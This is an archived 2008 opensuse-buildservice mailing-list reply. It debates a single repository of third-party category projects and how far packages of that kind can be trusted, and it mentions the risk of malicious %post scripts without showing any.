Mailinglist Archive: opensuse-buildservice (313 mails)

< Previous Next >
Re: [opensuse-buildservice] Integrating packages into Factory
  • From: "Archie Cobbs" <archie@xxxxxxxxxxxx>
  • Date: Tue, 29 Jul 2008 12:05:55 -0500
  • Message-id: <3bc8237c0807291005pd50fe4bn376c3745f31da2b8@xxxxxxxxxxxxxx>
On Tue, Jul 29, 2008 at 11:50 AM, Adrian Schröter <adrian@xxxxxxx> wrote:
So here's my suggestion. First, keep the three "levels of trust" we
have now: 1 = factory, 2 = established category projects like
network:telephony, Apache, etc., 3 = home:user projects.

Next, with each release of SUSE, create the normal SUSE distribution
using level 1 stuff, but also create a new "3rd party distribution"
containing the union of all level 2 projects, taken as a snapshot at
release time. The "3rd party distribution" could be shipped as a
separate set of ISO images and would also be hosted in a *single*
online repository (called e.g., "openSUSE 10.3 3rdParty").

This would have basically two effects:

1) The repository would cause plenty of conflicts, because we allow by
intention that packagers replace/update packages. It would cause a real
dependency hell when installing any package in YaST.

Yes, that is a potential problem. However, why should package X exist
in two different incarnations (not just _aggregate) in two different
projects (not counting home:user projects)? It seems like the
conflicts are caused by a separate underlying disorganization that
should be fixed and has nothing to do with how you split up repos.
Maybe I'm oversimplifying things?

2) everybody would be able to inject evil code to everybodys system.
(you do not even need to install a specific package, you would always
get the package with %post script sending your credit card credentials
to someone else). So no one should ever add this repo ever, simply because
it is a soo easy target that for sure plenty people will do it.

Seriously, I saw often enough code in configure scripts talk with online
server and sending private data that I will never install software which is
not trustable to some degree (or I have reviewed myself).

So... are you saying that projects like Apache and network:telephony
are not to be trusted? Then hmm, OBS just became a lot less useful to
the world.

Yes I agree there must be some kind of oversight to prevent evil %post
scripts. This is true of any open source project. Perhaps this is an
argument for setting up OSC commit mailing lists (like SVN commit
emails) for each OBS project, so other members of the project can
monitor changes... ?

In any case the trust question is an important one but is also a
separate one: if you can't trust Apache and network:telephony together
in one repository, then you can't trust them in two repositories
either. Orthogonal question.

So yes the trust equation needs to be figured out. But separate from
that, a single unified repository would be a lot more convenient,
trustworthy or not.

-Archie

--
Archie L. Cobbs
---------------------------------------------------------------------
To unsubscribe, e-mail: opensuse-buildservice+unsubscribe@xxxxxxxxxxxx
For additional commands, e-mail: opensuse-buildservice+help@xxxxxxxxxxxx

< Previous Next >
List Navigation
Follow Ups